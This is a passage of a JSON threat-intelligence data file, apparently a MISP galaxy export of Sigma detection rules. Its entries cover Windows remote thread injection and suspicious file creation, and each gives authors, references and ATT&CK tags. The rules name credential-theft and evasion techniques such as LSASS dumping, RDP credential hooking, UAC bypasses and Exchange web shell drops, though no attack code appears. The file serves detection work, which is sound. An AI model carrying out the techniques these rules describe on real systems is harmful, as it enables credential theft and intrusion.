"uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e", "value": "Remote Thread Creation Via PowerShell In Uncommon Target" }, { "description": "Detects remote thread creation from CACTUSTORCH as described in references.", "meta": { "author": "@SBousseaden (detection), Thomas Patzke (rule)", "creation_date": "2019-02-01", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_hktl_cactustorch.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://github.com/mdsecactivebreach/CACTUSTORCH", "https://twitter.com/SBousseaden/status/1090588499517079552", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1055.012", "attack.t1059.005", "attack.t1059.007", "attack.t1218.005" ] }, "related": [ { "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40", "value": "HackTool - CACTUSTORCH Remote Thread Creation" }, { "description": "Detects a potential remote thread creation with certain characteristics which are typical for Cobalt Strike beacons", "meta": { "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "creation_date": "2018-11-30", "falsepositive": [ "Unknown" ], "filename": 
"create_remote_thread_win_hktl_cobaltstrike.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055.001" ] }, "related": [ { "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "value": "HackTool - Potential CobaltStrike Process Injection" }, { "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. 
A single execution can lead to hundreds of events.\n", "meta": { "author": "Thomas Patzke", "creation_date": "2017-02-19", "falsepositive": [ "Antivirus products" ], "filename": "create_remote_thread_win_susp_password_dumper_lsass.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_password_dumper_lsass.yml" ], "tags": [ "attack.credential-access", "attack.s0005", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505", "value": "Password Dumper Remote Thread in LSASS" }, { "description": "Detects remote thread creation in the \"mstsc.exe\" process by a process located in a potentially suspicious location.\nThis technique is often used by attackers in order to hook some APIs used by DLLs loaded by \"mstsc.exe\" during RDP authentications in order to steal credentials.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-28", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_mstsc_susp_location.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "c0aac16a-b1e7-4330-bab0-3c27bb4987c7", "value": "Remote Thread Creation In Mstsc.Exe From Suspicious Location" }, { "description": "Detects a remote 
thread creation of Ttdinject.exe used as proxy", "meta": { "author": "frack113", "creation_date": "2022-05-16", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_ttdinjec.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "value": "Remote Thread Creation Ttdinject.exe Proxy" }, { "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", "meta": { "author": "oscd.community, Natalia Shornikova", "creation_date": "2020-10-06", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_powershell_lsass.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_lsass.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fb656378-f909-47c1-8747-278bf09f4f4f", "value": "Potential Credential Dumping Attempt Via PowerShell Remote Thread" }, { "description": "Detects uncommon target processes for remote thread creation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-16", "falsepositive": [ "Unknown" ], "filename": 
"create_remote_thread_win_susp_uncommon_target_image.yml", "level": "medium", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220319032520/https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_target_image.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055.003" ] }, "related": [ { "dest-uuid": "41d9846c-f6af-4302-a654-24bba2729bc6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03", "value": "Remote Thread Creation In Uncommon Target Image" }, { "description": "Detects uncommon processes creating remote threads.", "meta": { "author": "Perez Diego (@darkquassar), oscd.community", "creation_date": "2019-10-27", "falsepositive": [ "This rule is best put in testing first in order to create a baseline that reflects the data in your environment." 
], "filename": "create_remote_thread_win_susp_relevant_source_image.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io", "Personal research, statistical analysis", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_relevant_source_image.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02d1d718-dd13-41af-989d-ea85c7fab93f", "value": "Rare Remote Thread Creation By Uncommon Source Image" }, { "description": "Detects a dump file written by QuarksPwDump password dumper", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-02-10", "falsepositive": [ "Unknown" ], "filename": "file_event_win_hktl_quarkspw_filedump.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_quarkspw_filedump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", "value": "HackTool - QuarksPwDump Dump File" }, { "description": "Detects the creation of the LiveKD driver by a process image other than \"livekd.exe\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-16", "falsepositive": [ "Administrators might rename LiveKD before its usage which could trigger this. 
Add additional names you use to the filter" ], "filename": "file_event_win_sysinternals_livekd_driver_susp_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "059c5af9-5131-4d8d-92b2-de4ad6146712", "value": "LiveKD Driver Creation By Uncommon Process" }, { "description": "Detects the creation of a macro file for Outlook.", "meta": { "author": "@ScoubiMtl", "creation_date": "2021-04-05", "falsepositive": [ "User genuinely creates a VB Macro for their email" ], "filename": "file_event_win_office_outlook_macro_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_macro_creation.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1137", "attack.t1008", "attack.t1546" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", "value": "New Outlook Macro Created" }, { "description": "Detect creation of suspicious executable file names.\nSome strings look for suspicious file extensions, others look for filenames that exploit unquoted service 
paths.\n", "meta": { "author": "frack113", "creation_date": "2022-09-05", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_executable_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "74babdd6-a758-4549-9632-26535279e654", "value": "Suspicious Executable File Creation" }, { "description": "Detects the creation of an Office macro file from a suspicious process", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-23", "falsepositive": [ "Unknown" ], "filename": "file_event_win_office_macro_files_from_susp_process.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", "https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1c50487-1967-4315-a026-6491686d860e", "value": "Office Macro File Creation From Suspicious Process" }, { "description": "Detects 
msdt.exe creating files in suspicious directories, which could be a sign of exploitation of either the Follina (CVE-2022-30190) or DogWalk vulnerabilities", "meta": { "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Unknown" ], "filename": "file_event_win_msdt_susp_directories.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_susp_directories.yml" ], "tags": [ "attack.persistence", "attack.t1547.001", "cve.2022-30190" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "318557a5-150c-4c8d-b70e-a9910e199857", "value": "File Creation In Suspicious Directory By Msdt.EXE" }, { "description": "Detects the creation of a file with the \".dmp\"/\".hdmp\" extension by a shell or scripting application such as \"cmd\", \"powershell\", etc. Such files are often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials, so it is best to determine the source of the crash.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-07", "falsepositive": [ "Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive." 
], "filename": "file_event_win_dump_file_susp_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "aba15bdd-657f-422a-bab3-ac2d2a0d6f1c", "value": "Potentially Suspicious DMP/HDMP File Creation" }, { "description": "Detects the creation of a file by \"dllhost.exe\" in the System32 directory as part of the \"IDiagnosticProfileUAC\" UAC bypass technique", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-03", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/Wh04m1001/IDiagnosticProfileUAC", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48ea844d-19b1-4642-944e-fe39c2cc1fec", "value": "UAC Bypass Using IDiagnostic Profile - File" }, { "description": "Detects the creation of new DLL assembly files by \"aspnet_compiler.exe\", which could be a sign of \"aspnet_compiler\" abuse to proxy execution through a build provider.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-14", "falsepositive": [ "Legitimate assembly compilation using a build provider" ], "filename": "file_event_win_aspnet_temp_files.yml", "level": "medium", "logsource.category": "file_event", 
"logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_aspnet_temp_files.yml" ], "tags": [ "attack.execution" ] }, "uuid": "4c7f49ee-2638-43bb-b85b-ce676c30b260", "value": "Assembly DLL Creation Via AspNetCompiler" }, { "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_winrm_awl_bypass.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File" }, { "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-07-03", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "file_event_win_susp_desktopimgdownldr_file.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", 
"https://twitter.com/SBousseaden/status/1278977301745741825", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "value": "Suspicious Desktopimgdownldr Target File" }, { "description": "Detects the creation of TeamViewer_Desktop.exe, which is written to disk during a TeamViewer installation", "meta": { "author": "frack113", "creation_date": "2022-01-28", "falsepositive": [ "Unknown" ], "filename": "file_event_win_install_teamviewer_desktop.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "value": "Installation of TeamViewer Desktop" }, { "description": "Detects the default LSASS dump filename generated by SafetyKatz.", "meta": { "author": "Markus Neis", "creation_date": "2018-07-24", "falsepositive": [ "Rare legitimate files with similar filename structure" ], "filename": "file_event_win_hktl_safetykatz.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/SafetyKatz", 
"https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_safetykatz.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", "value": "HackTool - SafetyKatz Dump Indicator" }, { "description": "Detects creation of a file with an \".rdp\" extension by an application that doesn't commonly create such files.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-18", "falsepositive": [ "Unknown" ], "filename": "file_event_win_rdp_file_susp_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rdp_file_susp_creation.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "value": ".RDP File Created By Uncommon Application" }, { "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_wmp.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" ], "tags": [ "attack.defense-evasion", 
"attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", "value": "UAC Bypass Using Windows Media Player - File" }, { "description": "Detects the creation of files that indicate interactive use of PowerShell in the SYSTEM user context", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-12-07", "falsepositive": [ "Administrative activity", "PowerShell scripts running as SYSTEM user" ], "filename": "file_event_win_susp_system_interactive_powershell.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "value": "Suspicious Interactive PowerShell as SYSTEM" }, { "description": "Detects legitimate applications on a Windows system writing an archive file to disk, which they would not normally do", "meta": { "author": "frack113, Florian Roth", "creation_date": "2022-08-21", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_legitimate_app_dropping_archive.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml" ], 
"tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26", "value": "Legitimate Application Dropped Archive" }, { "description": "Detects the creation of a new PowerShell module \".psm1\", \".psd1\", \".dll\", \".ps1\", etc.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-09", "falsepositive": [ "Likely" ], "filename": "file_event_win_powershell_module_creation.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_creation.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "e36941d0-c0f0-443f-bc6f-cb2952eb69ea", "value": "PowerShell Module File Created" }, { "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_winsat.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "value": "UAC Bypass 
Abusing Winsat Path Parsing - File" }, { "description": "Detects a suspicious file type (e.g. an ASPX web shell) dropped by an Exchange component in IIS into a suspicious folder, as observed in attacks exploiting CVE-2022-41040 and CVE-2022-41082", "meta": { "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "creation_date": "2022-10-01", "falsepositive": [ "Unknown" ], "filename": "file_event_win_exchange_webshell_drop.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "value": "Suspicious ASPX File Drop by Exchange" }, { "description": "Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.\nThese files are used by the \"iexpress.exe\" utility in order to create self extracting packages.\nAttackers were seen abusing this utility and creating PE files with embedded \".sed\" entries.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2024-02-05", "falsepositive": [ "Unknown" ], "filename": "file_event_win_sed_file_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html", 
"https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior", "https://en.wikipedia.org/wiki/IExpress", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sed_file_creation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "760e75d8-c3b5-409b-a9bf-6130b4c4603f", "value": "Self Extraction Directive File Created In Potentially Suspicious Location" }, { "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", "meta": { "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "creation_date": "2019-04-08", "falsepositive": [ "Other legitimate tools using this driver and filename (like Sysinternals Process Explorer). Note - Clever attackers may easily bypass this detection by simply renaming the driver file. Therefore the rule is only Medium-level; do not rely on it alone." 
], "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" ], "tags": [ "attack.t1562.001", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3da70954-0f2c-4103-adff-b7440368f50e", "value": "Suspicious PROCEXP152.sys File Created In TMP" }, { "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. 
